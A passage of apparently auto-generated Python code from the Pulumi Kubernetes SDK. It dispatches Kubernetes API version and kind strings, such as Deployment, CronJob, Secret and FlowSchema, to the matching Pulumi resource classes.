if gvk == "apps/v1beta1/ControllerRevisionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import ControllerRevisionList
return [identifier.apply(
lambda x: (f"apps/v1beta1/ControllerRevisionList:{x}",
ControllerRevisionList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import Deployment
return [identifier.apply(
lambda x: (f"apps/v1beta1/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import DeploymentList
return [identifier.apply(
lambda x: (f"apps/v1beta1/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/StatefulSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import StatefulSet
return [identifier.apply(
lambda x: (f"apps/v1beta1/StatefulSet:{x}",
StatefulSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta1/StatefulSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta1 import StatefulSetList
return [identifier.apply(
lambda x: (f"apps/v1beta1/StatefulSetList:{x}",
StatefulSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ControllerRevision":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ControllerRevision
return [identifier.apply(
lambda x: (f"apps/v1beta2/ControllerRevision:{x}",
ControllerRevision(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ControllerRevisionList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ControllerRevisionList
return [identifier.apply(
lambda x: (f"apps/v1beta2/ControllerRevisionList:{x}",
ControllerRevisionList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/DaemonSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import DaemonSet
return [identifier.apply(
lambda x: (f"apps/v1beta2/DaemonSet:{x}",
DaemonSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/DaemonSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import DaemonSetList
return [identifier.apply(
lambda x: (f"apps/v1beta2/DaemonSetList:{x}",
DaemonSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import Deployment
return [identifier.apply(
lambda x: (f"apps/v1beta2/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import DeploymentList
return [identifier.apply(
lambda x: (f"apps/v1beta2/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ReplicaSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ReplicaSet
return [identifier.apply(
lambda x: (f"apps/v1beta2/ReplicaSet:{x}",
ReplicaSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/ReplicaSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import ReplicaSetList
return [identifier.apply(
lambda x: (f"apps/v1beta2/ReplicaSetList:{x}",
ReplicaSetList(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/StatefulSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import StatefulSet
return [identifier.apply(
lambda x: (f"apps/v1beta2/StatefulSet:{x}",
StatefulSet(f"{x}", opts, **obj)))]
if gvk == "apps/v1beta2/StatefulSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apps.v1beta2 import StatefulSetList
return [identifier.apply(
lambda x: (f"apps/v1beta2/StatefulSetList:{x}",
StatefulSetList(f"{x}", opts, **obj)))]
if gvk == "auditregistration.k8s.io/v1alpha1/AuditSink":
# Import locally to avoid name collisions.
from pulumi_kubernetes.auditregistration.v1alpha1 import AuditSink
return [identifier.apply(
lambda x: (f"auditregistration.k8s.io/v1alpha1/AuditSink:{x}",
AuditSink(f"{x}", opts, **obj)))]
if gvk == "auditregistration.k8s.io/v1alpha1/AuditSinkList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.auditregistration.v1alpha1 import AuditSinkList
return [identifier.apply(
lambda x: (f"auditregistration.k8s.io/v1alpha1/AuditSinkList:{x}",
AuditSinkList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v1/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v1 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v1/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v1/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v1 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v1/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v2/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v2/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta1/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta1 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v2beta1/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta1/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta1 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v2beta1/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta2/HorizontalPodAutoscaler":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta2 import HorizontalPodAutoscaler
return [identifier.apply(
lambda x: (f"autoscaling/v2beta2/HorizontalPodAutoscaler:{x}",
HorizontalPodAutoscaler(f"{x}", opts, **obj)))]
if gvk == "autoscaling/v2beta2/HorizontalPodAutoscalerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.autoscaling.v2beta2 import HorizontalPodAutoscalerList
return [identifier.apply(
lambda x: (f"autoscaling/v2beta2/HorizontalPodAutoscalerList:{x}",
HorizontalPodAutoscalerList(f"{x}", opts, **obj)))]
if gvk == "batch/v1/CronJob":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import CronJob
return [identifier.apply(
lambda x: (f"batch/v1/CronJob:{x}",
CronJob(f"{x}", opts, **obj)))]
if gvk == "batch/v1/CronJobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import CronJobList
return [identifier.apply(
lambda x: (f"batch/v1/CronJobList:{x}",
CronJobList(f"{x}", opts, **obj)))]
if gvk == "batch/v1/Job":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import Job
return [identifier.apply(
lambda x: (f"batch/v1/Job:{x}",
Job(f"{x}", opts, **obj)))]
if gvk == "batch/v1/JobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1 import JobList
return [identifier.apply(
lambda x: (f"batch/v1/JobList:{x}",
JobList(f"{x}", opts, **obj)))]
if gvk == "batch/v1beta1/CronJob":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1beta1 import CronJob
return [identifier.apply(
lambda x: (f"batch/v1beta1/CronJob:{x}",
CronJob(f"{x}", opts, **obj)))]
if gvk == "batch/v1beta1/CronJobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v1beta1 import CronJobList
return [identifier.apply(
lambda x: (f"batch/v1beta1/CronJobList:{x}",
CronJobList(f"{x}", opts, **obj)))]
if gvk == "batch/v2alpha1/CronJob":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v2alpha1 import CronJob
return [identifier.apply(
lambda x: (f"batch/v2alpha1/CronJob:{x}",
CronJob(f"{x}", opts, **obj)))]
if gvk == "batch/v2alpha1/CronJobList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.batch.v2alpha1 import CronJobList
return [identifier.apply(
lambda x: (f"batch/v2alpha1/CronJobList:{x}",
CronJobList(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1/CertificateSigningRequest":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1 import CertificateSigningRequest
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1/CertificateSigningRequest:{x}",
CertificateSigningRequest(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1/CertificateSigningRequestList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1 import CertificateSigningRequestList
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1/CertificateSigningRequestList:{x}",
CertificateSigningRequestList(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1alpha1/ClusterTrustBundle":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1alpha1 import ClusterTrustBundle
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1alpha1/ClusterTrustBundle:{x}",
ClusterTrustBundle(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1alpha1/ClusterTrustBundleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1alpha1 import ClusterTrustBundleList
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1alpha1/ClusterTrustBundleList:{x}",
ClusterTrustBundleList(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1beta1/CertificateSigningRequest":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1beta1 import CertificateSigningRequest
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1beta1/CertificateSigningRequest:{x}",
CertificateSigningRequest(f"{x}", opts, **obj)))]
if gvk == "certificates.k8s.io/v1beta1/CertificateSigningRequestList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.certificates.v1beta1 import CertificateSigningRequestList
return [identifier.apply(
lambda x: (f"certificates.k8s.io/v1beta1/CertificateSigningRequestList:{x}",
CertificateSigningRequestList(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1/Lease":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1 import Lease
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1/Lease:{x}",
Lease(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1/LeaseList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1 import LeaseList
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1/LeaseList:{x}",
LeaseList(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1beta1/Lease":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1beta1 import Lease
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1beta1/Lease:{x}",
Lease(f"{x}", opts, **obj)))]
if gvk == "coordination.k8s.io/v1beta1/LeaseList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.coordination.v1beta1 import LeaseList
return [identifier.apply(
lambda x: (f"coordination.k8s.io/v1beta1/LeaseList:{x}",
LeaseList(f"{x}", opts, **obj)))]
if gvk == "v1/Binding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Binding
return [identifier.apply(
lambda x: (f"v1/Binding:{x}",
Binding(f"{x}", opts, **obj)))]
if gvk == "v1/ConfigMap":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ConfigMap
return [identifier.apply(
lambda x: (f"v1/ConfigMap:{x}",
ConfigMap(f"{x}", opts, **obj)))]
if gvk == "v1/ConfigMapList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ConfigMapList
return [identifier.apply(
lambda x: (f"v1/ConfigMapList:{x}",
ConfigMapList(f"{x}", opts, **obj)))]
if gvk == "v1/Endpoints":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Endpoints
return [identifier.apply(
lambda x: (f"v1/Endpoints:{x}",
Endpoints(f"{x}", opts, **obj)))]
if gvk == "v1/EndpointsList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import EndpointsList
return [identifier.apply(
lambda x: (f"v1/EndpointsList:{x}",
EndpointsList(f"{x}", opts, **obj)))]
if gvk == "v1/Event":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Event
return [identifier.apply(
lambda x: (f"v1/Event:{x}",
Event(f"{x}", opts, **obj)))]
if gvk == "v1/EventList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import EventList
return [identifier.apply(
lambda x: (f"v1/EventList:{x}",
EventList(f"{x}", opts, **obj)))]
if gvk == "v1/LimitRange":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import LimitRange
return [identifier.apply(
lambda x: (f"v1/LimitRange:{x}",
LimitRange(f"{x}", opts, **obj)))]
if gvk == "v1/LimitRangeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import LimitRangeList
return [identifier.apply(
lambda x: (f"v1/LimitRangeList:{x}",
LimitRangeList(f"{x}", opts, **obj)))]
if gvk == "v1/Namespace":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Namespace
return [identifier.apply(
lambda x: (f"v1/Namespace:{x}",
Namespace(f"{x}", opts, **obj)))]
if gvk == "v1/NamespaceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import NamespaceList
return [identifier.apply(
lambda x: (f"v1/NamespaceList:{x}",
NamespaceList(f"{x}", opts, **obj)))]
if gvk == "v1/Node":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Node
return [identifier.apply(
lambda x: (f"v1/Node:{x}",
Node(f"{x}", opts, **obj)))]
if gvk == "v1/NodeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import NodeList
return [identifier.apply(
lambda x: (f"v1/NodeList:{x}",
NodeList(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolume":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolume
return [identifier.apply(
lambda x: (f"v1/PersistentVolume:{x}",
PersistentVolume(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolumeClaim":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolumeClaim
return [identifier.apply(
lambda x: (f"v1/PersistentVolumeClaim:{x}",
PersistentVolumeClaim(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolumeClaimList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolumeClaimList
return [identifier.apply(
lambda x: (f"v1/PersistentVolumeClaimList:{x}",
PersistentVolumeClaimList(f"{x}", opts, **obj)))]
if gvk == "v1/PersistentVolumeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PersistentVolumeList
return [identifier.apply(
lambda x: (f"v1/PersistentVolumeList:{x}",
PersistentVolumeList(f"{x}", opts, **obj)))]
if gvk == "v1/Pod":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Pod
return [identifier.apply(
lambda x: (f"v1/Pod:{x}",
Pod(f"{x}", opts, **obj)))]
if gvk == "v1/PodList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PodList
return [identifier.apply(
lambda x: (f"v1/PodList:{x}",
PodList(f"{x}", opts, **obj)))]
if gvk == "v1/PodTemplate":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PodTemplate
return [identifier.apply(
lambda x: (f"v1/PodTemplate:{x}",
PodTemplate(f"{x}", opts, **obj)))]
if gvk == "v1/PodTemplateList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import PodTemplateList
return [identifier.apply(
lambda x: (f"v1/PodTemplateList:{x}",
PodTemplateList(f"{x}", opts, **obj)))]
if gvk == "v1/ReplicationController":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ReplicationController
return [identifier.apply(
lambda x: (f"v1/ReplicationController:{x}",
ReplicationController(f"{x}", opts, **obj)))]
if gvk == "v1/ReplicationControllerList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ReplicationControllerList
return [identifier.apply(
lambda x: (f"v1/ReplicationControllerList:{x}",
ReplicationControllerList(f"{x}", opts, **obj)))]
if gvk == "v1/ResourceQuota":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ResourceQuota
return [identifier.apply(
lambda x: (f"v1/ResourceQuota:{x}",
ResourceQuota(f"{x}", opts, **obj)))]
if gvk == "v1/ResourceQuotaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ResourceQuotaList
return [identifier.apply(
lambda x: (f"v1/ResourceQuotaList:{x}",
ResourceQuotaList(f"{x}", opts, **obj)))]
if gvk == "v1/Secret":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Secret
return [identifier.apply(
lambda x: (f"v1/Secret:{x}",
Secret(f"{x}", opts, **obj)))]
if gvk == "v1/SecretList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import SecretList
return [identifier.apply(
lambda x: (f"v1/SecretList:{x}",
SecretList(f"{x}", opts, **obj)))]
if gvk == "v1/Service":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import Service
return [identifier.apply(
lambda x: (f"v1/Service:{x}",
Service(f"{x}", opts, **obj)))]
if gvk == "v1/ServiceAccount":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ServiceAccount
return [identifier.apply(
lambda x: (f"v1/ServiceAccount:{x}",
ServiceAccount(f"{x}", opts, **obj)))]
if gvk == "v1/ServiceAccountList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ServiceAccountList
return [identifier.apply(
lambda x: (f"v1/ServiceAccountList:{x}",
ServiceAccountList(f"{x}", opts, **obj)))]
if gvk == "v1/ServiceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.core.v1 import ServiceList
return [identifier.apply(
lambda x: (f"v1/ServiceList:{x}",
ServiceList(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1/EndpointSlice":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1 import EndpointSlice
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1/EndpointSlice:{x}",
EndpointSlice(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1/EndpointSliceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1 import EndpointSliceList
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1/EndpointSliceList:{x}",
EndpointSliceList(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1beta1/EndpointSlice":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1beta1 import EndpointSlice
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1beta1/EndpointSlice:{x}",
EndpointSlice(f"{x}", opts, **obj)))]
if gvk == "discovery.k8s.io/v1beta1/EndpointSliceList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.discovery.v1beta1 import EndpointSliceList
return [identifier.apply(
lambda x: (f"discovery.k8s.io/v1beta1/EndpointSliceList:{x}",
EndpointSliceList(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1/Event":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1 import Event
return [identifier.apply(
lambda x: (f"events.k8s.io/v1/Event:{x}",
Event(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1/EventList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1 import EventList
return [identifier.apply(
lambda x: (f"events.k8s.io/v1/EventList:{x}",
EventList(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1beta1/Event":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1beta1 import Event
return [identifier.apply(
lambda x: (f"events.k8s.io/v1beta1/Event:{x}",
Event(f"{x}", opts, **obj)))]
if gvk == "events.k8s.io/v1beta1/EventList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.events.v1beta1 import EventList
return [identifier.apply(
lambda x: (f"events.k8s.io/v1beta1/EventList:{x}",
EventList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/DaemonSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import DaemonSet
return [identifier.apply(
lambda x: (f"extensions/v1beta1/DaemonSet:{x}",
DaemonSet(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/DaemonSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import DaemonSetList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/DaemonSetList:{x}",
DaemonSetList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/Deployment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import Deployment
return [identifier.apply(
lambda x: (f"extensions/v1beta1/Deployment:{x}",
Deployment(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/DeploymentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import DeploymentList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/DeploymentList:{x}",
DeploymentList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/Ingress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import Ingress
return [identifier.apply(
lambda x: (f"extensions/v1beta1/Ingress:{x}",
Ingress(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/IngressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import IngressList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/IngressList:{x}",
IngressList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/NetworkPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import NetworkPolicy
return [identifier.apply(
lambda x: (f"extensions/v1beta1/NetworkPolicy:{x}",
NetworkPolicy(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/NetworkPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import NetworkPolicyList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/NetworkPolicyList:{x}",
NetworkPolicyList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/PodSecurityPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import PodSecurityPolicy
return [identifier.apply(
lambda x: (f"extensions/v1beta1/PodSecurityPolicy:{x}",
PodSecurityPolicy(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/PodSecurityPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import PodSecurityPolicyList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/PodSecurityPolicyList:{x}",
PodSecurityPolicyList(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/ReplicaSet":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import ReplicaSet
return [identifier.apply(
lambda x: (f"extensions/v1beta1/ReplicaSet:{x}",
ReplicaSet(f"{x}", opts, **obj)))]
if gvk == "extensions/v1beta1/ReplicaSetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.extensions.v1beta1 import ReplicaSetList
return [identifier.apply(
lambda x: (f"extensions/v1beta1/ReplicaSetList:{x}",
ReplicaSetList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1alpha1 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1alpha1/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta1 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta1/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta2 import PriorityLevelConfigurationList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta2/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/FlowSchema":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import FlowSchema
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/FlowSchema:{x}",
FlowSchema(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/FlowSchemaList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import FlowSchemaList
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/FlowSchemaList:{x}",
FlowSchemaList(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfiguration":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import PriorityLevelConfiguration
return [identifier.apply(
lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfiguration:{x}",
PriorityLevelConfiguration(f"{x}", opts, **obj)))]
if gvk == "flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfigurationList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.flowcontrol.v1beta3 import PriorityLevelConfigurationList
return [identifier.apply(
